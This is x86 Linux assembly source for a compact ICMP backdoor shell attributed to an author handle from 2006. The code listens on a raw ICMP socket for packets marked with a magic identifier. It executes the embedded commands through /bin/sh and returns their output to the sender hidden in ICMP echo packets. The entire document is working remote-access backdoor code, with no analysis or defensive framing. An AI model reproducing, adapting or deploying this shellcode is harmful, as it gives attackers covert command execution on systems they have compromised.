; ; Copyright (c) 2007 by ; ; 235-byte raw-socket ICMP/checksum shell - (x86-lnx) ; by mu-b - Nov 2006 ; ; icmp with identifier __flag_byte and commands in the ; following format:- ; "/bin/sh\x00-c\x00\x00" ; ; unlike *other* icmp shells, this will reply with ; 255-(sizeof icmp_hdr) bytes of output.. ; %define zero_reg esi %define zero_reg_w si %define sock_reg edi %define __flag_byte 6996h global _shell _shell: xor zero_reg, zero_reg mov ebp, esp ; sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); _socket: lea ebx, [zero_reg+3] push byte 1 push ebx dec ebx push ebx dec ebx mov ecx, esp lea eax, [zero_reg+66h] int 80h ; socket(); mov sock_reg, eax ; setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &1, 1); _setsockopt: push ebx push esp push byte 3h push zero_reg push sock_reg mov ecx, esp mov bl, byte 0eh mov al, byte 66h int 80h ; setsocketopt(); ; while(1) _while_loop: ; read(sockfd, cmd, 255); cdq dec byte dl mov ecx, ebp mov ebx, sock_reg lea eax, [zero_reg+3] int 80h ; read(); lea ebx, [ebp+24] xor [ebx], word __flag_byte jne short _while_loop ; pipe(pp) lea ebx, [ebp-8] mov al, byte 2ah int 80h ; pipe(); ; fork() mov al, byte 2h int 80h ; fork(); test eax, eax jnz short _parent _child: ; close(pp[0]) mov ebx, [ebp-8] mov al, byte 6h int 80h ; close(); ; dup2(pp[1], 0); dup2(pp[1], 1); dup2(pp[1], 2); lea ecx, [zero_reg+3] ; pp[1] == pp[0]+1 inc ebx .1: dec ecx mov al, byte 3fh int 80h ; dup2(); jnz .1 ; execve(cmd + 28, {cmd + 28, cmd + 36, cmd + 39, 0}, 0); push zero_reg lea ebx, [ebp+39] push ebx sub ebx, byte 3 push ebx sub ebx, byte 8 push ebx mov ecx, esp cdq mov al, byte 0bh int 80h ; execve(); _parent: ; close(pp[1]) mov ebx, [ebp-4] lea eax, [zero_reg+6] int 80h ; close(); _parent_read: .1: ; read(pp[0], cmd, bytes_left); ; edx == 255 lea ecx, [ebp+28] mov ebx, [ebp-8] mov al, byte 3h int 80h ; read(); test eax, eax jl _while_loop mov al, byte 6h int 80h ; close(); .2: ; fix up ttl (optional?! make sure its high!) ; mov [ebp+8], byte 0ffh ; switch ip's mov ecx, [ebp+12] xchg [ebp+16], ecx mov [ebp+12], ecx ; set icmp type to echo reply (optional?!) ;mov [ebp+20], word zero_reg_w ; zero checksum ;mov [ebp+22], word zero_reg_w ; set icmp type to echo and zero checksum mov [ebp+20], zero_reg lea ecx, [zero_reg+117] lea esi, [ebp+20] cdq .3: lodsw add edx, eax loop .3 lodsb xor ah, ah add eax, edx mov esi, eax shr eax, byte 16 movzx esi, si add eax, esi mov edx, eax shr edx, byte 16 add eax, edx not ax ; set checksum mov [ebp+22], word ax cdq xor eax, eax xor zero_reg, zero_reg ; struct sockaddr * push zero_reg push zero_reg push dword [ebp+16] push byte 2 ; sendto(sockfd, cmd, 255, 0, ...); mov ecx, esp push byte 16 push ecx push zero_reg mov dl, byte 0ffh push edx push ebp push sock_reg mov ecx, esp mov bl, 0bh mov al, 66h int 80h ; sendto(); cdq mov ecx, ebp mov ebx, zero_reg mov al, 72h int 80h ; wait(); jmp _while_loop